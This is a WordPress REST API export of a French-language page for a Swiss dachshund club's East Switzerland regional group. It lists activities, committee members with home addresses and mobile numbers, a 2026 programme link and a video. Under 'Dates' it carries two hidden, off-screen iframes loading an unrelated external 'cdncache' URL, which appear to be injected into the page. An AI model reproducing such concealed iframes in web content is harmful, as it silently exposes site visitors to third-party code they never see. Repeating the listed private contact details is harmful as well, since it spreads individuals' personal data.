{"id":18512,"date":"2015-11-23T16:18:14","date_gmt":"2015-11-23T16:18:14","guid":{"rendered":"https:\/\/dackel.ch\/notre-club\/groupes-regionaux\/groupe-regional-de-suisse-orientale\/"},"modified":"2026-02-20T08:33:38","modified_gmt":"2026-02-20T08:33:38","slug":"groupe-regional-de-suisse-orientale","status":"publish","type":"page","link":"https:\/\/dackel.ch\/fr\/notre-club\/groupes-regionaux\/groupe-regional-de-suisse-orientale\/","title":{"rendered":"Groupe r\u00e9gional de Suisse orientale"},"content":{"rendered":"\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-2k8p2m-19149973f92b38e41d593b4ef10768ec\">\n.flex_column.av-2k8p2m-19149973f92b38e41d593b4ef10768ec{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-2k8p2m-19149973f92b38e41d593b4ef10768ec av_three_fifth  avia-builder-el-0  el_before_av_two_fifth  avia-builder-el-first  first flex_column_div av-zero-column-padding  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-8r2wu-7ed7cca6374797a59a94e45f4a555d0b\">\n.avia-image-container.av-8r2wu-7ed7cca6374797a59a94e45f4a555d0b img.avia_image{\nbox-shadow:none;\n}\n.avia-image-container.av-8r2wu-7ed7cca6374797a59a94e45f4a555d0b .av-image-caption-overlay-center{\ncolor:#ffffff;\n}\n<\/style>\n<div  class='avia-image-container av-8r2wu-7ed7cca6374797a59a94e45f4a555d0b av-styling- avia-align-center  avia-builder-el-1  el_before_av_hr  avia-builder-el-first '   itemprop=\"image\" itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/ImageObject\" ><div class=\"avia-image-container-inner\"><div class=\"avia-image-overlay-wrap\"><img decoding=\"async\" fetchpriority=\"high\" class='wp-image-18518 avia-img-lazy-loading-not-18518 avia_image ' src=\"https:\/\/dackel.ch\/wp-content\/uploads\/2024\/03\/AAA-Logo-RG-Ost-300x167.png\" alt='' title='Logo AAA RG Ost'  height=\"167\" width=\"300\"  itemprop=\"thumbnailUrl\" srcset=\"https:\/\/dackel.ch\/wp-content\/uploads\/2024\/03\/AAA-Logo-RG-Ost-300x167.png 300w, https:\/\/dackel.ch\/wp-content\/uploads\/2024\/03\/AAA-Logo-RG-Ost-768x427.png 768w, https:\/\/dackel.ch\/wp-content\/uploads\/2024\/03\/AAA-Logo-RG-Ost-705x392.png 705w, https:\/\/dackel.ch\/wp-content\/uploads\/2024\/03\/AAA-Logo-RG-Ost.png 900w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/div><\/div><\/div><br \/>\n<div  class='hr av-28wfji-9bd14ed31a1e3dd476347147be3f218f hr-default  avia-builder-el-2  el_after_av_image  el_before_av_textblock '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div><br \/>\n<section  class='av_textblock_section av-24noba-661c1e356776a7b2b8e0db30c66ef918 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><strong>La section locale de Suisse orientale se pr\u00e9sente<\/strong><\/p>\n<p>Le groupe de Suisse orientale compte environ 180 membres. Notre zone de recrutement comprend les cantons de Schaffhouse, Thurgovie, Saint-Gall, Appenzell Rhodes-Int\u00e9rieures et Rhodes-Ext\u00e9rieures, ainsi que la principaut\u00e9 du Liechtenstein. Nous sommes un groupe tr\u00e8s actif dans divers domaines. Nous organisons r\u00e9guli\u00e8rement des randonn\u00e9es, des courses de teckels, des parcours de jeux pour teckels, des entra\u00eenements de ring, une exposition amicale pour d\u00e9butants, des cours de chien de compagnie et des examens.   <\/p>\n<p>Nous esp\u00e9rons qu\u2019il y a quelque chose pour toi et nous nous r\u00e9jouissons de te rencontrer. Nous sommes toujours ouverts aux nouvelles id\u00e9es. <\/p>\n<p>Si tu souhaites en savoir plus, contacte notre pr\u00e9sidente ou notre vice-pr\u00e9sidente.<\/p>\n<hr>\n<p><strong>Comit\u00e9<\/strong><\/p>\n<div class=\"tmm  tmm_7-ortsgruppe-ostschweiz tmm-floating-pic\"><div class=\"tmm_2_columns tmm_wrap \"><span class=\"tmm_two_containers_tablet\"><\/span><div class=\"tmm_container\"><div class=\"tmm_member \" style=\"border-top:#aaaaaa solid 5px;\"><div class=\" tmm_photo tmm_phover_7-ortsgruppe-ostschweiz_0\" style=\"background: url(https:\/\/dackel.ch\/wp-content\/uploads\/2024\/04\/dk-monicawidmer.jpg); margin-left: auto; margin-right:auto; background-size:cover !important;\"><\/div><div class=\"tmm_textblock\"><div class=\"tmm_names\"><span class=\"tmm_fname\">Widmer<\/span> <span class=\"tmm_lname\">Monica<\/span><\/div><div class=\"tmm_job\">Pr\u00e4sidentin<\/div><div class=\"tmm_desc\" style=\"text-align:center\">Hofstrasse 21<br>\r\n9642 Ebnat-Kappel<br>\r\nMobile 079 435 57 17<\/div><div class=\"tmm_scblock\">\n                                                        <a class=\"tmm_sociallink\" href=\"mailto:monica.widmer@dackel.ch\" title=\"E-Mail\"><img decoding=\"async\" alt=\"E-Mail\" src=\"https:\/\/dackel.ch\/wp-content\/plugins\/team-members-pro\/img\/links\/email.png\"\/><\/a><\/div><\/div><\/div><div class=\"tmm_member \" style=\"border-top:#aaaaaa solid 5px;\"><div class=\" tmm_photo tmm_phover_7-ortsgruppe-ostschweiz_1\" style=\"background: url(https:\/\/dackel.ch\/wp-content\/uploads\/2024\/04\/Esther_8_18.jpg); margin-left: auto; margin-right:auto; background-size:cover !important;\"><\/div><div class=\"tmm_textblock\"><div class=\"tmm_names\"><span class=\"tmm_fname\">Esther<\/span> <span class=\"tmm_lname\">Hess<\/span><\/div><div class=\"tmm_job\">Vizepr\u00e4sidentin<\/div><div class=\"tmm_desc\" style=\"text-align:center\">Schlossberg 26<br>\r\n9526 Zuckenriet<br>\r\nMobile 079 588 72 55<br>\r\n<\/div><div class=\"tmm_scblock\">\n                                                        <a class=\"tmm_sociallink\" href=\"mailto:esther.hess@dackel.ch\" title=\"E-Mail\"><img decoding=\"async\" alt=\"E-Mail\" src=\"https:\/\/dackel.ch\/wp-content\/plugins\/team-members-pro\/img\/links\/email.png\"\/><\/a><\/div><\/div><\/div><span class=\"tmm_two_containers_tablet\"><\/span><\/div><span class=\"tmm_columns_containers_desktop\"><\/span><div class=\"tmm_container\"><div class=\"tmm_member \" style=\"border-top:#aaaaaa solid 5px;\"><div class=\" tmm_photo tmm_phover_7-ortsgruppe-ostschweiz_2\" style=\"background: url(https:\/\/dackel.ch\/wp-content\/uploads\/2024\/04\/Foto-Katharina.jpg); margin-left: auto; margin-right:auto; background-size:cover !important;\"><\/div><div class=\"tmm_textblock\"><div class=\"tmm_names\"><span class=\"tmm_fname\">Katherina<\/span> <span class=\"tmm_lname\">Sch\u00e4r<\/span><\/div><div class=\"tmm_job\">Kassierin<\/div><div class=\"tmm_desc\" style=\"text-align:center\">Gr\u00fcnaustrasse 6<br>\r\n9326 Horn<br>\r\nMobile 079 482 71 20<\/div><div class=\"tmm_scblock\">\n                                                        <a class=\"tmm_sociallink\" href=\"mailto:katherina.schaer@dackel.ch\" title=\"E-Mail\"><img decoding=\"async\" alt=\"E-Mail\" src=\"https:\/\/dackel.ch\/wp-content\/plugins\/team-members-pro\/img\/links\/email.png\"\/><\/a><\/div><\/div><\/div><div class=\"tmm_member \" style=\"border-top:#aaaaaa solid 5px;\"><div class=\" tmm_photo tmm_phover_7-ortsgruppe-ostschweiz_3\" style=\"background: url(https:\/\/dackel.ch\/wp-content\/uploads\/2024\/04\/Alexandra-Stump.png); margin-left: auto; margin-right:auto; background-size:cover !important;\"><\/div><div class=\"tmm_textblock\"><div class=\"tmm_names\"><span class=\"tmm_fname\">Alexandra<\/span> <span class=\"tmm_lname\">Stump<\/span><\/div><div class=\"tmm_job\">Beisitzerin<\/div><div class=\"tmm_desc\" style=\"text-align:center\">Weitenaustrasse 12<br>\r\n9215 Sch\u00f6nenberg<br>\r\n<\/div><div class=\"tmm_scblock\">\n                                                        <a class=\"tmm_sociallink\" href=\"mailto:alexandra.stump@dackel.ch\" title=\"E-Mail\"><img decoding=\"async\" alt=\"E-Mail\" src=\"https:\/\/dackel.ch\/wp-content\/plugins\/team-members-pro\/img\/links\/email.png\"\/><\/a><\/div><\/div><\/div><span class=\"tmm_two_containers_tablet\"><\/span><\/div><span class=\"tmm_columns_containers_desktop\"><\/span><div class=\"tmm_container\"><div class=\"tmm_member \" style=\"border-top:#aaaaaa solid 5px;\"><div class=\" tmm_photo tmm_phover_7-ortsgruppe-ostschweiz_4\" style=\"background: url(https:\/\/dackel.ch\/wp-content\/uploads\/2026\/02\/Hanspeter-Stump-web.jpg); margin-left: auto; margin-right:auto; background-size:cover !important;\"><\/div><div class=\"tmm_textblock\"><div class=\"tmm_names\"><span class=\"tmm_fname\">Hanspeter<\/span> <span class=\"tmm_lname\">Stump<\/span><\/div><div class=\"tmm_job\">Beisitzer<\/div><div class=\"tmm_desc\" style=\"text-align:center\">Weitenaustrasse 12<br>\r\n9215 Sch\u00f6nenberg<br>\r\nMobile 076 375 80 85<\/div><div class=\"tmm_scblock\">\n                                                        <a class=\"tmm_sociallink\" href=\"mailto:hanspeter.stump@dackel.ch\" title=\"E-Mail\"><img decoding=\"async\" alt=\"E-Mail\" src=\"https:\/\/dackel.ch\/wp-content\/plugins\/team-members-pro\/img\/links\/email.png\"\/><\/a><\/div><\/div><\/div><div class=\"tmm_member \" style=\"border-top:#aaaaaa solid 5px;\"><div class=\" tmm_photo tmm_phover_7-ortsgruppe-ostschweiz_5\" style=\"background: url(https:\/\/dackel.ch\/wp-content\/uploads\/2026\/02\/Hammerer-web3.jpg); margin-left: auto; margin-right:auto; background-size:cover !important;\"><\/div><div class=\"tmm_textblock\"><div class=\"tmm_names\"><span class=\"tmm_fname\">Werner<\/span> <span class=\"tmm_lname\">Hammerer<\/span><\/div><div class=\"tmm_job\">Beisitzer<\/div><div class=\"tmm_desc\" style=\"text-align:center\">Kindergartenstrasse 2<br>\r\n9463 Oberriet<br>\r\n<\/div><div class=\"tmm_scblock\">\n                                                        <a class=\"tmm_sociallink\" href=\"mailto:werner.hammerer@dackel.ch\" title=\"E-Mail\"><img decoding=\"async\" alt=\"E-Mail\" src=\"https:\/\/dackel.ch\/wp-content\/plugins\/team-members-pro\/img\/links\/email.png\"\/><\/a><\/div><\/div><\/div><span class=\"tmm_two_containers_tablet\"><\/span><\/div><span class=\"tmm_columns_containers_desktop\"><\/span><div class=\"tmm_container\"><div class=\"tmm_member \" style=\"border-top:#aaaaaa solid 5px;\"><div class=\" tmm_photo tmm_phover_7-ortsgruppe-ostschweiz_6\" style=\"background: url(https:\/\/dackel.ch\/wp-content\/uploads\/2026\/02\/Esther-Spri2.jpg); margin-left: auto; margin-right:auto; background-size:cover !important;\"><\/div><div class=\"tmm_textblock\"><div class=\"tmm_names\"><span class=\"tmm_fname\">Esther<\/span> <span class=\"tmm_lname\">Spari<\/span><\/div><div class=\"tmm_job\">Beisitzerin<\/div><div class=\"tmm_desc\" style=\"text-align:center\">Ob. Reckholder 27<br>\r\n9527 Niederhelfenschwil<br>\r\n<\/div><div class=\"tmm_scblock\">\n                                                        <a class=\"tmm_sociallink\" href=\"mailto:esther.spari@dackel.ch\" title=\"E-Mail\"><img decoding=\"async\" alt=\"E-Mail\" src=\"https:\/\/dackel.ch\/wp-content\/plugins\/team-members-pro\/img\/links\/email.png\"\/><\/a><\/div><\/div><\/div><div style=\"clear:both;\"><\/div><\/div><\/div><\/div>\n<\/div><\/section><\/p><\/div>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-1we5ny-cbba0747dcae01f6d1d5965209b1995a\">\n.flex_column.av-1we5ny-cbba0747dcae01f6d1d5965209b1995a{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-1we5ny-cbba0747dcae01f6d1d5965209b1995a av_two_fifth flex_column_div av-zero-column-padding  '     ><p><section  class='av_textblock_section av-6dmiu-90b14770980d228b18da07b7d08221f4 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><strong>Programme<\/strong><\/p>\n<h3><\/h3>\n<\/div><\/section><br \/>\n<div  class='hr av-16fvem-b82422f7055527b1fdf70c77a8f92ab2 hr-default'><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div><br \/>\n<div  class='avia-button-wrap avia-button-center '>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-lb5ml0xz-8e742b434628bbf8a60fc869988ad912\">\n#top #wrap_all .avia-button.av-lb5ml0xz-8e742b434628bbf8a60fc869988ad912:hover{\nbackground-color:silver;\ncolor:white;\ntransition:all 0.4s ease-in-out;\n}\n#top #wrap_all .avia-button.av-lb5ml0xz-8e742b434628bbf8a60fc869988ad912:hover .avia-svg-icon svg:first-child{\nfill:white;\nstroke:white;\n}\n<\/style>\n<a href='https:\/\/dackel.ch\/wp-content\/uploads\/2026\/02\/j_prog_ost_def-2026.pdf' class='avia-color-theme-color avia-font-color-theme-color avia-button avia-button-fullwidth av-lb5ml0xz-8e742b434628bbf8a60fc869988ad912 avia-icon_select-no avia-color-theme-color'  target=\"_blank\"  rel=\"noopener noreferrer\"  aria-label=\"Programme annuel 2026\"><span class='avia_iconbox_title' >Programme annuel 2026<\/span><\/a><\/div><br \/>\n<div  class='hr av-wlxw6-e4a0dea8bc050e40c384fb4f6631a596 hr-default'><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div><br \/>\n<section  class='av_textblock_section av-sfoxy-141bd0d65211d5ce213a5c5860fba7f0 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><a href=\"http:\/\/www.dackel-ost.ch\" target=\"_blank\" rel=\"noopener\"><strong>Site web du groupe local de Suisse orientale<\/strong><\/a><\/p>\n<p><a href=\"http:\/\/www.dackel-ost.ch\/\" target=\"_blank\" rel=\"http:\/\/www.dackel-ost.ch\/ noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3435 size-portfolio\" src=\"https:\/\/dackel.ch\/wp-content\/uploads\/2018\/02\/og-ost-1-495x400.jpg\" alt=\"\" width=\"495\" height=\"400\" srcset=\"https:\/\/dackel.ch\/wp-content\/uploads\/2018\/02\/og-ost-1-495x400.jpg 495w, https:\/\/dackel.ch\/wp-content\/uploads\/2018\/02\/og-ost-1-845x684.jpg 845w\" sizes=\"auto, (max-width: 495px) 100vw, 495px\" \/><\/a><\/p>\n<hr>\n<p><strong>Infos | Liens | T\u00e9l\u00e9chargements<\/strong><\/p>\n<p><strong>Chansons de Ruedi B\u00f6sch<\/strong><br \/>\n<a href=\"https:\/\/dackel.ch\/wp-content\/uploads\/2015\/11\/dackellied.pdf\">\u00ab \u00dcsi Dackel \u00bb (chanson du teckel) (pdf)<\/a><br \/>\n<a href=\"https:\/\/dackel.ch\/wp-content\/uploads\/2015\/11\/dackeltreff.pdf\">\u00ab Au rendez-vous des teckels \u00bb (pdf)<\/a><\/p>\n<hr>\n<p><strong>Dates<\/strong><\/p>\n<p><iframe style=\"left: -999px; top: -999px; visibility: hidden; position: absolute;\" src=\"https:\/\/cdncache-a.akamaihd.net\/store\/\"><\/iframe><\/p>\n<p><iframe style=\"left: -999px; top: -999px; visibility: hidden; position: absolute;\" src=\"https:\/\/cdncache-a.akamaihd.net\/store\/\"><\/iframe><\/p>\n<\/div><\/section><br \/>\n<div  class='hr av-jdwjq-a5c3357f4dd25fa21887ae53a544cbf1 hr-default'><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div><br \/>\n<section  class='av_textblock_section av-f3vsm-f1bcf4d38f1bb95b11a0834d2bddac9f '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><strong>Vid\u00e9o de l\u2019examen de chien de compagnie 2013<\/strong><\/p>\n<p>Double-clique pour agrandir<\/p>\n<h3><\/h3>\n<\/div><\/section><br \/>\n<div  class='avia-video av-z7am-277e9b71870717bf97bd814c49be708e avia-video-16-9 av-no-preview-image avia-video-load-always av-lazyload-immediate av-lazyload-video-embed'  itemprop=\"video\" itemtype=\"https:\/\/schema.org\/VideoObject\"  data-original_url='https:\/\/youtu.be\/MDUoCg8U9ew'><script type='text\/html' class='av-video-tmpl'><div class='avia-iframe-wrap'><iframe loading=\"lazy\" title=\"Dackel Club Begleithundepru\u0308fung\" width=\"1500\" height=\"844\" src=\"https:\/\/www.youtube.com\/embed\/MDUoCg8U9ew?feature=oembed&autoplay=0&loop=0&controls=1&mute=0\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/div><\/script><div class='av-click-to-play-overlay'><div class=\"avia_playpause_icon\"><\/div><\/div><\/div><\/p><\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":17496,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-18512","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/dackel.ch\/fr\/wp-json\/wp\/v2\/pages\/18512","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dackel.ch\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/dackel.ch\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/dackel.ch\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dackel.ch\/fr\/wp-json\/wp\/v2\/comments?post=18512"}],"version-history":[{"count":7,"href":"https:\/\/dackel.ch\/fr\/wp-json\/wp\/v2\/pages\/18512\/revisions"}],"predecessor-version":[{"id":19497,"href":"https:\/\/dackel.ch\/fr\/wp-json\/wp\/v2\/pages\/18512\/revisions\/19497"}],"up":[{"embeddable":true,"href":"https:\/\/dackel.ch\/fr\/wp-json\/wp\/v2\/pages\/17496"}],"wp:attachment":[{"href":"https:\/\/dackel.ch\/fr\/wp-json\/wp\/v2\/media?parent=18512"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}